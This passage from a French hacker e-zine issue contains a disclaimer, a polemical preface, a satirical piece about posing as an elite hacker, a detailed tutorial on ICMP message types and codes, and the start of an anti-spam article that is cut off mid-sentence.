Copy Link
Add to Bookmark
Report

Cyber Hacker's Guide 2

eZine's profile picture
Published in 
Cyber Hackers Guide
 · 4 years ago

  

--------------------------------------------------------------------------------------------

C . H . G .

Cyber Hacker's Guide

II

--------------------------------------------------------------------------------------------

Disclaimer :

Attention :Le contenu de ce mag peut heurter la sensibilité de certaines personnes.Veuillez
attentivement lire ce qui suit, si vous souhaitez continuer la lecture de ce document.

Tout ce qui est contenu dans ce mag n'est présent qu'à titre indicatif. Nous vous rappelons
qu'accéder, de façon consciente ou non à un ou des systèmes, ou excéder les droits d'accès
alloués, et par ce comportement, obtenir n'importe quel type d'information est illégal.
Causer l'interruption d'un programme, d'informations, de code, de commandes sur un système
sans autorisation est illégal.

Cyber-Hack ainsi que les autres auteurs de ce mag n'assume absolument aucunes
responsabilités des conséquences que pourrait avoir sur vous ou votre environnement tout ce
qui est présent dans ce zine. Cyber-Hack et tout ce qui s'y rattache ne peut être tenu comme
responsable d'une mauvaise utilisation de ce qui est présenté ici.

Attention, toutes les informations sont fournies "tel quel", la précision ou la justesse
des informations présentes dans ce mag sont sujettes à des conjectures. Aucune garantie
implicite, ou non implicite, et d'aucun type que ce soit n'est assurée par Cyber-Hack ou par
tous ceux qui s'y rattachent de près ou de loin.

Vous utilisez les informations qui sont fournies dans ce mag à vos propres risques!
Cependant nous nous engageons à essayer de fournir le moins d'informations erronées qu'il
nous est possible. Si vous utilisez des sources ou des textes présentés ici, nous vous
demandons que leur origine soit citée.

Tous les personnages mentionnés dans cet e-zine sont purement et simplement fictifs.
Toutes ressemblances avec des personnes, vivantes ou décédées, est purement accidentelle
et n'est le fruit que de la coïncidence.

Finalement :la lecture de ce document est réservé aux seuls membres de l'underground
informatique qui agréant aux points précédents ne font pas partie des catégories suivantes :
employé d'un état, d'une institution et/ou agence gouvernementale, de la police, de l'armée,
de la SEFTI, de la DST, de la DGSE, de la GRC ou de toute organisation affiliée de près ou
de loin aux précédentes ainsi qu'à toutes personne ayant un rapport direct ou indirect
avec un quelconque service similaire.
L'accès a ce texte par ces mêmes personnes ou institutions constituent donc une violation
du copyright car cela revient à lire des informations propriétaires ! (c) constituant ainsi
une atteinte à la vie privée.. A bon entendeur....

L'équipe de Cyber-Hack.


Préface :

Et oui voilà que sort le numéro 2 du Cyber Hacker's Guide... Dans l'ensemble le mag a été
bien accueuilli; bien mieux que ce que j'avais espéré, alors nous allons continuer. Vous
avez probablement tous lu : Altern.org condamné à payer plus de 400000 francs à cause d'
une pouf à poil... Ca s'est un peu arrangé mais bon....ca me dégoute, Serge Humpich volé
et muselé par GIE... tandis que les services affiliés à la répression du crime
informatique se multiplient et se complaisent dans leur ignorance de l'underground... Si
j'ai eu un jour une once d'espoir dans les pouvoirs politiques, ce devait être dans une
autre vie. Ne vous leurrez pas, tous ces gars là sont pourris avec tous ceux qui les
entourent !! Alors moi je n'ai qu'une chose à dire : c'est que nous devons leur montrer
que nous ne sommes pas des boeufs à la raison étriquée qu'on mène par le bout du nez. On
sait penser par nous même et raisonner, une faculté qui est aujourd'hui un véritable
trésor ! Sachez le conserver et vous en servir ! Même si en ce moment les sites
underground, les teams et les zines fleurissent, c'est aussi le cas de ceux qui cherchent
à nous dénigrer ou à nous tourner à la dérision... Un exemple ? allez,en plus je lui fais
de la pub : http://www.chez.com/zipiz. Alors comme vous pouvez très bien l'imaginer nous
sommes toujours à la recherche d'auteurs pour écrire dans ce zine. Bon je crois que j'ai
bien assez parlé ;) alors....


Bonne lecture!

#Brain Override#



--------------------------------------------------------------------------------------------

TABLE DES MATIERES

--------------------------------------------------------------------------------------------

I] Comment devenir un élite hacker
sans connaître une goutte d'informatique !!! #Illegal#
II] Les services ICMP #Brain.Override#
III] Quelques trucs de hackers pour un monde meilleur !!! #Illegal#
IV] Les failles made in 3COM #Brain.Override#
V] Liste des ports par défaut utilisés par les trojans #Brain.Override#
VI] Liste de quelques sites intéressants #Brain.Override#
VII] Conseal Pc firewall... #Brain.Override#
VIII] ZIPIZ #Brain.Override#
IX] Un décodeur de tonalité #Brain.Override#
X] Qu'est-ce qu'un Hacker ? #Brain.Override#
--------------------------------------------------------------------------------------------
I] COMMENT DEVENIR UN ELITE HACKER SANS CONNAITRE UNE GOUTTE D'INFORMATIQUE !!!

Le but de cet article est de permettre a un plus grand nombre, parmis vous, de rentrer dans
ce monde fermé des hackers.

Quelques restrictions:
être agé de 15 voir 16 ans, c'est un maximum. A partir de 25 ans, tout hacker se considère
déjà lui même comme un grand gouroux élite hacker a donf.
Par contre, avoir 15 ans et dire ouvertement: "Je suis le plus jeune Elite Hacker", ca c'
estle must.

2ème restriction en fonction du pays:

Pour un hacker Francais:
Avoir de grosses lunettes, être boutonneux, boire du coca, fumer comme un pompier et avoir
les cheveux gras.

Pour un hacker Ricains:
Là, on doit obligatoirement avoir un look CoWbOyzzz. Lunettes noires de rocker, blouson
perfecto, cheveux long, boire de la BUD, porter des rangers et surtout terminer toutes ses
phrases par "Fuck".

Premierement: Le choix du pseudo.

Evites absolument les pseudos type: ZIZIPANPAN, GOLDORAK, TINTIN, car n'oublies pas que
dans le monde des hackers tu sera jugé non pas sur tes compétences, mais surtout sur ce
que tu représentes, choisi plutôt un pseudo comme:

BRAIN OVERRIDE, ARCHANGEL, EL CONDOR, DOMINIX, TOTAL ANNIHILITION, DOOM, ILLEGAL

Là, déjà, rien qu'avec un pseudo comme ça, tu fais peur. Bon, ensuite, il va falloir
rentrer dans le monde hacker, une seul solution, passer à l'attaque.

Personnellement, je préconiserais la technique dite du "lonely Hacker" dite également
technique du "hacker solitaire". Se pointer, en pleine heure de pointe dans un magazin
type SURCOUF ou FNAC, choisir absoluement un magazin informatique, j'ai essayé au rayon
boucherie CASINO, cela na rien donné du tout. Donc, se pointer dans un magazin type
SURCOUF, au rayon soft, là où il y a plein de monde, et dire haut et fort au vendeur:

"EXCUSEZ MOI, JE SUIS A LA RECHERCHE D'UN EDITEUR HEXADECIMAL TYPE HEX EDIT AINSI QUE DE
MICROSOFT ASSEMBLEUR et SOFTICE",

automatiquement un mec devrait te taper sur l'épaule et te dire: "EXCUSE MOI MEC, MAIS TU
TROUVERAS PAS CA ICI, JE TE DONNE RENDEZ-VOUS DEMAIN A LA MEME HEURE, A TEL ENDROIT". Là,
c'est le must, la rencontre dite "rencontre du troisieme type" non seulement tu vas
connaître un vrai pirate mais en plus tu vas pouvoir rentrer dans le milieu. En language
hacker, on parle alors de SCENE.

Mais attention, lors de la rencontre, ne rien dire de trop technique au cas ou!!! Si tu
tombes sur un vrai EliTe HaCkEr, tu aurais tout faux. Apres a toi de jouer!

Deuxième technique, dite "cyber technique" dite "technique alt.2600":

S'abonner au groupe de news "alt.2600" un news group de "Hackers" où il y a de tout sauf
de vrais HaCkErs, et écouter les conversations. A un moment donné, automatiquement, on va
voir une discussion s'enflamer avec plein de réponses type "FUCK OFF". Suivre surtout un
pseudo, ARCHANGEL c'est un mec qui aurait écrit "CIA HACKERS" mais personne ne l'a lu.
Personnellement, je suis devenu un Elite hackers et prouvant aux autres que ARCHANGEL était
un charlot. Donc,a ce moment là, rentrer dans la conversation et s'imposer en médiateur,
et balancer un truc du genre:

"Calmez vous les gars!!! On a tous un point commun, le hacking, et la soif de connaissance,
alors, faites la paix, c'est exactement ce que le gouvernement voudrait, que l'on se
dispute. Unissons nous et nous serons plus fort" Terminer sont message par un petit mot du
type: "Si parmis vous, il y a quelques jeunes qui aimeraient connaître et avoir des
renseignements sur differentes techniques, qu'ils s'adressent a moi... Vous les jeunes
êtes notre avenir !!!"

Là, automatiquement, tu dois recevoir plein de "mail" du genre: "greeting, you're really an
elite and cool hacker, you've got all my respect" en traduisant ca donne:
"Félicitations, vous etes vraiment un hacker d'exception, vous avez tout mon respect"
et voila, BINGO, vous êtes un Vrai EliTe HaCkEr !!!
Bon, va surement aussi arriver le moment de la confrontation type dite "DEF COn Porte
d'Italie"... Pas de pannique, souvent, il y aura toujours plus de mecs comme toi que de
vrais hacker. Le vrai Hacker étant trop occupé pour participer à de telles reunions. Une
seule solution, impressionner son monde, acheter un "t shirt" type 2600 le fameux journal de
hackers que personne n'a lu, mais que tout le monde connait.
Inscrire son pseudo dans le dos, avec "FREE KEVIN' dessus, et en route pour la réunion
de hackers, succès garanti.

Voila, mon prochain article traitera de la technique dite "CHATTING IRC" et LINUX.
Bonne continuation, et n'hésitez pas à me transmettre vos avancées personnelles dans le
monde des hackers.

#!LLEGAL#
du groupe L.O.L.
(Legion Of Linux)



--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------



II] Les services ICMP



Vous savez probablement tous ce qu'est plus ou moins ICMP. Avant donc de parler des services
proprement dit, un petit rappel sur ce qu'est ICMP.

Le protocole IP offre un service de remise de datagramme sans connection, cependant il ne
tente pas d'assurer une remise fiable de ces mêmes datagrammes. C'est aux protocoles de
couches supérieures tels que TCP, qu'incombe cette tâche. Il existe cependant un moyen pour
le protocole IP, d'envoyer des messages d'alerte et de diagnostic par l'intermédiaire d'un
module. Ce module c'est bien entendu ICMP (Internet Control Message Protocole ou encore :
Protocole de message de contrôle Internet). Ces messages ont pour but de permettre de
détecter des problèmes potentiels ou réels.

En effet, le protocole IP ayant été conçu dans un souci de simplicité, des erreurs
surviennent souvent, lors de la transmission d'un datagramme. Ces erreurs sont généralement
détectées au niveau d'un routeur intermédiaire comme par exemple si le réseau de destination
est de type local à diffusion tel qu'un Ethernet, le routeur s'apperçoit que l'hôte n'est
pas disponible au moment où il utilise l'ARP pour trouver l'adresse matérielle de l'hôte de
destination à partir de son adresse IP. Quand ce cas se présente, le routeur tente d'en
informer l'emetteur en envoyant un message ICMP qui indique que l'hôte de destination n'est
pas disponible. Il existe bien sur d'autres types de problèmes comme l'expiration du champ
TTL, l'indisponibilité d'un protocole etc..

ICMP est plus simplement, le protocole particulier qui utilisé conjointement à IP permet d'
alerter le réseau sur l'existence d'erreurs, de tester le réseau et d'obtenir des infos le
concernant.

Bon pour résumer disons que :

Toutes les implémentations IP doivent implémenter le ICMP
ICMP est un client de IP (il s'exécute au dessus) bien qu'il soit implémenter dans IP.
ICMP bien que signalant les condition d'erreur ne rend pas le protocole IP plus fiable.
ICMP ne signale les erreurs que pour le premier fragment d'un datagramme.
ICMP ne génère aucun message d'erreur concenant les problèmes affectant des datagrammes
ICMP.

ICMP ne doit pas signaler les problèmes suivants :

Broadcast ou multicast.
Routage ou remise des messages ICMP.
Diffusion ou multidiffusion au niveau de la couche de liaison de données.

Si vous voulez plus d'infos : RFC 792,950,1812,1122,1256 et 1191.


Bon maintenant passons aux services proprement dit. Je suis sur que les petis lamers qui
cliquent sur "attaque packet ICMP Destination unreachable" dans leur super 3l33t WareZ
WarlordZ programmes n'en soupçonnent même pas le fonctionnement...



-----------------
| Services ICMP |
-----------------
|
|
---------------------------------------------------------------------------
| | | | | | | |
-------- | ----------------- | ---------------------------- | --------------- |
| Echo | | | Time exceeded | | | Parameter unintelligible | | | Adress mask | |
-------- | ----------------- | ---------------------------- | --------------- |
| | | |
| | | |
------------- --------------------------- ------------ -----------------
| Timestamp | | Destination Unreachable | | Redirect | | Source quench |
------------- --------------------------- ------------ -----------------



Comme vous pouvez le constater, ICMP fournit une gamme assez large de services de messages
d'erreur, d'information et de diagnostic.

Les principaux services sont listés si dessus. Voyons un peu leur utilité :

Echo : Ce service est utilisé comme un outil de diagnostic et sert à déterminer si un noeud
IP est accessible.

Timestamp : C'est en quelque sorte un "marqueur de temps", en fait il est utilisé pour la
mesure du temps sur un inter-réseau.

Time exceeded : C'est le temps écoulé. Ce service est utilisé pour indiquer l'expiration de
la valeur du champs TTL de l'en-tête de l'IP.

Destination unreachable : Qu'on peut traduire par destination inaccessible est un service
qui indique simplement qu'un noeud IP n'est pas accessible.

Parameter unintelligible ou encore parameter problem : Indique un problème dans un
datagramme IP

Redirect : C'est un service utilisé par les routeurs pour indiquer une route de substitution

Adress mask : Il s'agit du masque d'adresse, c'est à dire que ce service permet d'obtenir
des informations de masque de sous-réseau pour le réseau.

Source quench : Ce service sert simplement à indiquer un problème de congestion à la source.


Quel que soit le message ICMP le format général reste à peu de choses près le même. Le
premier octet de l'en-tête ICMP est le champ Type, indiquant le type du service ICMP. L'
octet suivant contient une valeur code décrivant plus en détail la nature du type de
message. Il faut donc considérer les valeurs des champs type ET code pour déterminer la
valeur exacte du message ICMP.


Un petit schéma qui montre la structure générale des messages IP.


Octets
|---------------------------------------------------------------------------------------
| | 1 | 1 | 2 | 4 | | ICMP | IP |
|---------------------------------------------------------------------------------------
| En-tête IP | Type | Code | Total de contrôle | Paramètre | Informations | Data link |
|---------------------------------------------------------------------------------------
| |
| |
| ---------------------------------
| | En-tête IP en échec + 64 bits |
| | de données ULP |
| ---------------------------------
|
|
|
|
-----------------------------------------
| Type | ICMP Message |
-----------------------------------------
| 0 | Echo reply |
| 3 | Destination unreachable |
| 4 | Source quench |
| 5 | Redirect |
| 8 | Echo request |
| 11 | Time exceeded |
| 12 | Parameter (IP) unintelligible |
| 13 | Timestamp request |
| 14 | Timestamp reply |
| 15 | Information request |
| 16 | Information reply |
| 17 | Adress mask request |
| 18 | Adress mask reply |
-----------------------------------------

Bon comme en plus je suis gentil je vais vous donner la liste des valeurs de type pour ICMP


---------------------------------------------------------
| Valeur de type | Signification |
---------------------------------------------------------
| 0 | Echo reply |
| 1 | Unassigned |
| 2 | Unassigned |
| 3 | Destination Unreachable |
| 4 | Source Quench |
| 5 | Redirect |
| 6 | Alternate Host Address |
| 7 | Unassigned |
| 8 | Echo |
| 9 | Router Advertisement |
| 10 | Router Selection |
| 11 | Time Exceeded |
| 12 | Parameter Problem |
| 13 | Timestamp |
| 14 | Timestamp Replay |
| 15 | Information Request |
| 16 | Information Reply |
| 17 | Address Mask Request |
| 18 | Address Mask Reply |
| 19 | Reserved (for security) |
| 20-29 | Reserved (for Robustness Experiment) |
| 30 | Traceroute |
| 31 | Datagram Conversion Error |
| 32 | Mobile Host Redirec |
| 33 | IPv6 Where-Are-You |
| 34 | IPv6 I-AM-Here |
| 35 | Mobile Registration Request |
| 36 | Mobile Registration Reply |
| 37-255 | Reserved |
---------------------------------------------------------



Les types ICMP 0 et 8 : Echo/PING

Les messages ICMP les plus utilisés sont sans doute les types Echo 0 et 8. Il s'agit des
messages utilisés pour le diagnostic par l'utilitaire PING (Packet Internet Groper).
PING permet en effet de vérifier qu'un noeud est "vivant" et accessible. Ping fonctionne
de la manière suivante :
Il envoie un message ICMP de type Requête d'écho (8) à un noeud IP. A la réception du
message, le noeud IP renvoie un message ICMP de réponse d'écho (0). Le message de réponse
d'écho contient une copie des données envoyées dans le message de requête d'écho. La
réception d'un message de réponse d'echo confirme que la couche IP et les couches
inférieures du système de transport fonctionnent bien entre la source et la destination.
Si des routeurs intermédiaires sont rencontrés entre la source et la destination, le
message de réponse d'écho indique aussi que les routeurs sont en mesure de transmettre des
datagrammes entre la source et la destination. Le noeud IP est généralement un hôte ou un
routeur.

L'utilitaire PING est utilisé pour générer le message de requête d'écho ICMP. Le module IP
qui s'éxécute sur le noeud de destination répond automatiquement aux messages ICMP de
requête d'écho générés par PING. Je ne m'étendrai pas d'avantage sur les différentes options
et fonctionnalités de PING sur les divers type d'OS.





Type ICMP3 : Destination inaccessible.

La non remise d'un datagramme est généralement détectée par les routeurs, le plus souvent,
c'est le dernier routeur de la chaîne des routeurs du chemin emprunté par le datagramme.

Quand un routeur se trouve dans l'incapacité de remettre un datagramme, il en avertit l'
emetteur par le biais d'un message ICMP de destination inaccessible. Les protocoles de
couche supérieure, tels que TCP, transmettent le message perdu sans connaître la cause de
l'échec de la remise. Le message ICMP permet dans certains cas d'indiquer à l'emetteur cette
cause.


Codes pour le message Destination inaccessible
---------------------------------------------------------------------------------
| Code | Signification |
---------------------------------------------------------------------------------
| 0 | Net Unreachable |
| 1 | Host Unreachable |
| 2 | Protocol Unreachable |
| 3 | Port Unreachable |
| 4 | Fragmentation Nedded and Don't Fragment was Set |
| 5 | Source Route Failed |
| 6 | Destination Network Unknow |
| 7 | Destination Host Unknow |
| 8 | Source Host Isolated |
| 9 | Communication with Destination Network is Administratively Prohibited |
| 10 | Communication with Destination Host is Administratively Prohibited |
| 11 | Destination Network Unreachable for Type of Service |
| 12 | Destination Host Unreachable for Type of Service |
| 13 | Communication Administratively prohibited because of firewalls |
| 14 | Host Precedence Violation |
| 15 | Precedence cut-off in effect |
---------------------------------------------------------------------------------




Code 0 : Réseau inaccessible

Cette valeur est générée lorsque le réseau spécifié dans l'adresse IP de destination est
introuvable. Seuls les routeurs peuvent générer ce message. La cause peut être l'erreur
dans l'IP de destination ou dans la table de routage du routeur générant le message ICMP.
L'adresse source contenue dans l'en-tête IP transportant ce message identifie le routeur
ayant généré l'erreur.



Code 1 : Hôte inaccessible

Cette valeur est générée par le routeur qui est directement connecté au réseau de
destination. Elle indique que le datagramme a été remis avec succès par les routeurs mais
que le dernier routeur se trouve dans l'incapacité de communiquer avec l'hôte. Les causes
peuvent être multiples : routeur qui ne parvient pas à déterminer l'adresse matérielle de
destination à l'aide du protocole ARP, hôte hors service, mal configuré ou IP spécifiée
incorrecte. C'est l'adresse source contenue dans l'en-tête IP qui transporte le message
ICMP qui identifie le routeur qui à généré l'erreur. Ce type de message d'erreur (code 1)
implique un échec dans la remise tandis que les messages d'erreur de type code 0 impliquent
un échec lors du routage.



Code 2 : Protocole inaccessible

Ce code est généré pas lhôte de destination. Il indique que le datagramme a bien atteint
l'hôte de destination mais que le protocole de couche supérieure, transporté par le
datagramme IP et identifié par le champs protocole de l'en-tête IP, n'est pas disponible.
Les protocoles de couche supérieure les plus courant sur les hôtes TCP/IP sont TCP, UDP et
OSPF. La majorité des hôtes TCP/IP prennent au moins en charge TCP et UDP. Un message ICMP
qui indique qu'un tel protocole est inaccessible est signe d'un grave problème de
configuration au niveau de l'hôte. Dans la majorité des cas, les systèmes TCP/ip mettent
en place des données spécifiques pour la configuration. Par ex sous UNIX le fichier
/etc/protocols.



Code 3 : Port inaccessible

Ce code est généré lorsque le protocole de couche de transport indiqué est incapable de
démultiplexer le datagramme et ne dispose pas d'autre moyen pour en informer l'emetteur.
La cause peut être par ex l'absence d'un service d'application spécifique au niveau de
l'hote de destination.

Les services d'application sont identifiés par des numéros de port TCP ou UDP. Sur la
pluspart des systèmes, ces services sont lancés après lecture de fichiers de configuration
dédiés, (ex sous Unix : /etc/inetd.conf) lors de l'initialisation du système TCP/IP.

A notre aussi que de nombreux systèmes emploient le concept de processus de serveur,appelé
le superdemon inetd, qui écoute les requêtes arrivant sur les numéros de port de service
d'application. Il arrive lorque le processus de serveur n'est pas activé que les services
d'application soient indisponibles.



Code 4 : Fragmentation nécessaire et flag Ne pas fragmenter est activé

Ce code est généré par les routeurs qui doivent fragmenter le datagramme parce que la taille
de MTU de l'interface de réseau par laquelle doit trasiter le datagramme est inférieure à
celle du datagramme. Si dans l'en-tête IP du datagramme, le flag (DF) est mis à 1, le
routeur ne peut transmettre le datagramme et doit donc l'écarter. Il envoie alors à l'
emetteur initial un message ICMP de type 3 signalant que le datagramme n'a pu être envoyé,
le code 4 en indiquant la raison.



Code 5 : Echec du source route

Ce code est (encore) généré par un routeur. Il est généré seulement pour les datagrammes
IP utilisant l'option IP Source Route.

Si un routeur se trouve dans l'incapacité de transmettre le datagramme en respectant le
chemin de source route, il doit écarter le datagramme, puis envoyer à l'émetteur un
message ICMP type 3 code 5, indiquant que la source route a échoué. L'identité du routeur
qui a généré ce message peut être trouvé en examinant le champ d'adresse source de l'en-tête
IP du message ICMP.

Le message ICMP Echec source route doit contenir une option source route de même type
(strict ou loose), créée en prenant dns l'option de source route du datagramme initial la
portion du champ d'option située avant le pointeur de route enregistrée, et en l'inversant.
Le seul cas où les champs de source route du datagramme fautif ne sont pas utilisés se
rencontre lorsqu'un message ICMP Problème de paramètre concernant une source route est
envoyé, ou lorsque le routeur a connaissance de règlements qui empêcheraient la remise du
message ICMP utilisant les informations de source route du datagramme initial.



Code 6 : Réseau de destination inconnu

Ce message n'est jamais généré sur un réseau réel, car le routeur préfèrer génerer un
message de type 3 code 0, ce code est obsolète. En théorie, il était supposé être généré
par un routeur lorsque celui-ci aurait détecté, en consultant sa table de routage un réseau
de destination inconnu



Code 7 : Hôte de destination inconnu

Ce code est généré par un routeur lorsque celui-ci peut détecter, par le biais du logiciel
de couche de liaison situé au niveau de son interface de réseau, que l'hôte de destination
n'existe pas.

Le protocole de couche de liaison de données pour les liaisons point to point peut détecter
l'existence de périphériques à chacunes des extrémités de la liaison.

Si un routeur est connecté à l'hôte de destination via un réseau local à diffusion tel qu'
Ethernet, le routeur ne peut déterminer que l'hôte n'existe pas. Dans le cas d'un réseau
local, le routeur envoie une requête ARP pour déterminer l'adresse matérielle, et s'il ne
reçoit pas de réponse, il suppose que l'hôte de destinatino est inaccessible.

Les routeurs doivent utilisér de messages code 1 ou code 7 lorque d'autres hôttes du même
réseau de destination sont accessibles, sinon l'emetteur pourrait conclure à tort que tous
les hôtes du réseau sont inaccessibles.



Code 8 : Hôte source isolé

STD3, qui est décrit par le RFC 1122, définit un message de code 8. Ce message est généré
lorsqu'un routeur peut détecter que l'hôte source est isolé du reste du réseau. Toutefois,
le RFC 1812 déclare que les routeurs ne doivent pas générer de messages de code 8 mais
doivent utiliser plutôt un code 0 ou code 1, selon la circonstance. Les codes 8 sont donc
obsolètes.



Codes 9 et 10 : communication avec le réseau/hôte de destination inter. par l'administrateur

Un code 9 indique que la communication avec le réseau de destination est interdite
administrativement tandis que le code 10 indique que c'est la communication avec l'hôte
de destination qui est interdite.

Les codes 9 et 10 furent conçus pour être utilisés par des périphériques de chiffrement
point à point des agences militaires américaines. Le RFC 18112 déclare que les routeurs
doivent utiliser le code 13 nouvellement défini (communication interdite par l'
administrateur) dans le cas d'un filtrage adminstratif des paquets.




Codes 11 et 12 : Réseau/Hôte de destination inaccessible pour le type de service

Ces messages sont générés si un routeur est incapable de transmettre le datagramme à un
réseau ou à un hôte de destination parce que les routes de sa table de routage ne peuvent
trouver le type de service (TOS) demandé, ou la valeur de TOS par défaut. La valeur de TOS
est spécifiée dans l'en-tête IP du datagramme et permet de spécifier la présénce, le retard
, le débit et le coût du chemin suivi par le datagramme.

Un code 11 indique que le réseau de destination est inaccessible pour le TOS spécifié, un
code 12 insique que c'est l'hôte de destination qui est inaccessible.



Code 13 : Communication interdite par l'administrateur du fait d'un coupe-feu

La pluspart des routeurs récents disposent d'un logiciel de filtrage des paquets permettant
de mettre en place des règles de filtrage interdisant la transmission de paquets au vu de
l'adresse IP, du type de protocole, des numéros de port spécifiés, etc. Ce filtrage est une
mesure de sécurité et constitue la première ligne de défense contre des intrusions hostiles.

L'implémentation d'un routeur peut envoyer des messages ICMP indiquant que le datagramme n'a
pu être transmis pour des raisons administratives. Malheureusement pour nous (mais beaucoup
ne le font pas), le routeur peut être configuré pour ne pas envoyer de tels messages. Dans
ce cas aucun message d'erreur ICMP ne sera renvoyé pour chaque paquet refusé
administrativement. De cette manière, le routeur ne risque pas de donner des informations
supplémentaires à l'émetteur des paquets suspects.



Code 14 : Violation de préseance d'hôte

Ce message est généré par le routeur de premier pas c'est à dire le premier routeur que le
datagramme doit franchir pour atteindre sa destination. Ce message ICMP est généré pour
indiquer que la préséance demandée n'est pas permise pour l'adresse source-destination
spécifiée, pour le protocole de couche supérieure ou pour les numéros de port
source-destination

Le routeur peut également être configuré de manière à ne pas renoyer de message de code 14.



Code 15 : Precedence cut-off in effect

Ce code est également généré par un routeur. Un administrateur peut spécifier un niveau
de préséance minimale, requis pour une route spécifique de la table de routage. Si le
datagramme a été envoyé avec une préséance inférieure, il ne peut être transmis par cette
route. Si le datagramme doit être écarté, un message ICMP type 3 code 15 est envoyé à l'
émetteur.

Le routeur peut être dans ce cas aussi configuré pour ne pas générer de code 15.






Le type ICMP 4 : source Quench.

Le réseau IP est sans connexion. Les routeurs d'un réseau IP transmettent les datagrammes IP
unité par unité et ne réservent pas de mémoire pour les datagrammes d'une session
particulière. Le concept même de session est étranger au processus de routage. Il est donc
possible que des routeurs connaissent une congestion temporaire, c'est à dire un état dans
lequel il n'y a plus assez de mémoire ou de place dans le tampon pour que le routeur puisse
stocker les datagrammes entrants. Lorsqu'une congestion survient, plusieurs routeurs du
réseau peuvent être affectés. Les datagrammes entrants peuvent ne pas être traités
immédiatemment parce que le routeur est occupé à traiter d'autres datagrammes. Les tampons
sont utilisés par les routeurs pour stocker temporairement les datagrammes avant traitement
et transmission.

Les routeurs connectés à des liaisons lentes sont osuvent la proie de congestion, mais ce
peut être également le cas de routeurs disposant de peu de mémoire ou de puissance de calcul
limitée. Lorsqu'un routeur subit une congestion et que ses tampons sont pleins, il doit
écarter les datagrammes entrants. Le routeur génère alors des messages ICMP Source Quench
pour demander aux émetteurs de ralentir la fréquence de leurs envois. Le message Source
Quench est un mécanisme assez rudimentaire de régulation de flux, destiné à éviter que les
routeurs ne soient submergés par les datagrammes entrants.

Il n'existe pour l'instant aucun message ICMP permettant d'annuler ou d'inverser le message
Source Quench pour indiquer que la congestion a cessé. Les problèmes de contrôle de flux
sont mieux traités par les protocoles de couche de transport tels que TCP, responsables de
la remise fiable des données. Voir pour plus d'infos les RFC 1122 1106 et 1812





Le type ICMP 5 : Redirection

Ce type de message est envoyé par un routeur chaque fois que celui-ci détecte qu'un autre
routeur propose un chemin optimal pour le datagramme. Les routeurs échangent des
informations de routage sur le réseau à l'aide d'un protocole de routage. A chaque instant,
les routeurs disposent d'informations optimales ou presque, concernant les routes possibles
dans le réseau. Quant aux hôtes, ils ne disposent que d'informations de routage minimales.
Un hôte ne connaît généralement que quelques réseaux et le routeur de prochain pas
permettant d'accéder à chacun de ces réseaux. Les routeurs de prochain pas sont les routeurs
situés à un pas (hop) de la source. Autrement dit, l'hôte source et ses routeurs de
prochain pas sont connectés directement. De plus les hôtes disposent généralement d'un
routeur par défaut, utilisé pour transmettre les datagrammes vers toutes les destinations
qui ne figurent pas explicitement dans la table de routage de l'hôte.

L'initialisation de la table de routage d'un hôte se fait généralement au démarrage du
système. Les informations de cette table figurent dans la zone de données de configuration
de l'hôte, la pluspart du temps sous forme de fichiers. Si la topologie du réseau change,
les routeurs prennent connaissance des nouvelles routes permettant d'atteindre les
différentes destinations, car les protocoles de routage qu'ils utilisent leur permettent
d'échanger des informations sur la topologie et conservent des tables de routage qui ne sont
plus optimales.

A la réception d'un message ICMP Redirection, les hôtes doivent mettre à jour leur table de
routage en tenant compte des nouvelles informations concernant le nouveau routeur. Le
prochain datagramme envoyé à la même destination devra utiliser la route optimale
mentionnée dans le message Redirection. Toutefois certaines implémentaions d'hôte TCP/IP
ignorent purement et simplement les messages ICMP de redirection chaque fois qu'un
datagramme est envoyé au routeur non optimal.

Le routeur qui génère le message ICMP de redirection transmet aussi le datagramme au routeur
optimal. Comme cette transmission peut se faire sur le réseau qui a reçu le datagramme, le
nombre de datagrammes transmis est doublé

La présence de messages ICMP indique la possibilité que des routes ne soient pas optimales.

Valeurs des codes pour le message ICMP de redirection

------------------------------------------------------------------------
| Code | Signification |
------------------------------------------------------------------------
| 0 | Rediriger le datagramme pour le réseau (ou sous réseau) |
| 1 | Rediriger le datagramme pour l'hôte |
| 2 | Rediriger le datagramme pour le Type de Service et le réseau |
| 3 | Rediriger le datagramme pour le Type de Service et l'hôte |
------------------------------------------------------------------------


Les messages de code 0 et de code 2 s'appliquent à tous les hôtes du réseau spécifié.
Le code 3 est généré lorsque le paquet qui a provoqué le message de redirection ICMP doit
être envoyé par un chemin qui dépendrait, en partien du TOS demandé.

Pour que les routeurs puissent générer ce type de message il faut impérativement uqe les
conditions suivantes soient vérifiées :

Le datagramme est transmis vers l'extérieur par l'interface physique utilisée pour sa
réception.

L'adresse IP source figurant dans les paquets est sur le même (sous) réseau IP que l'
adresse IP de prochain pas.

Le datagramme ne contient pas une option IP Source route.



Pour finir récapitulons :

ICMP est une composante obligatoire de IP qui permet d'envoyer des messages d'alerte et de
diagnostic par le biais du module ICMP. Le module ICMP est implémenté au sein du module IP.
Les messages ICMP sont donc très utiles pour la détection de problèmes réels ou potentiels
sur un réseau. On peut générer des messages ICMP en réponse à des conditions d'erreur très
variées. Les messages ICMP servent également à diagnostiquer un réseau et à établir des
statistiques concernant celui-ci. J'espère que vous en comprendrez grâce à cette doc les
autres utilisations que vous pouvez en faire....


#Brain Override#


--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------


III]QUELQUES TRUCS DE HACKERS POUR UN MONDE MEILLEUR !!!

(ici, il ne sera traité que de technique pouvant apporter des connaissances à la
compréhension de tout ce qui touche a l'Internet, en aucun cas, il ne sera question de
techniques dangereuses voir illégales (NDRL: Bouhhhh!). Donc, pas la peine de me contacter
pour ce genre d'info.). Un petite remarque en passant, je dis bien " à l'Internet " et non
pas " à Internet ", l'Internet n'étant pas une marque (NDRL: Il fait toujours des siennes à
ce sujet...).

Le mot Hacker est souvent employé a tord en voulant parler d'un pirate, la traduction du mot
Hacker peut se traduire par le mot " bidouilleur " ou par tout autre mot désignant quelqu'un
de curieux, qui recherche le pourquoi du comment, qui expérimente diverses techniques. A ne
pas confondre avec Pirates, qui est une personne qui s'introduit sur un système informatique
, a l'insu par exemple de l'administrateur de la machine (NDRL: C'est vrai ça,pauvre Admin;)
, dans le but de modifier des pages web, de " pomper " de l'information, de les revendre,
etc etc... C'est une pratique tout a fait condamnable, et d'ailleurs souvent condamnée.
Divers articles suivront celui-ci. (NDRL : On espère)

" COMMENT LUTER CONTRE LES SPAMMERS "

Qu'est ce que c'est que ca un spam????
Le mot Spam a pour origine une marque de conserve de type corned beef au contenu
difficilement identifiable mais très populaire dans les pays Anglo-saxons. Ce mot est
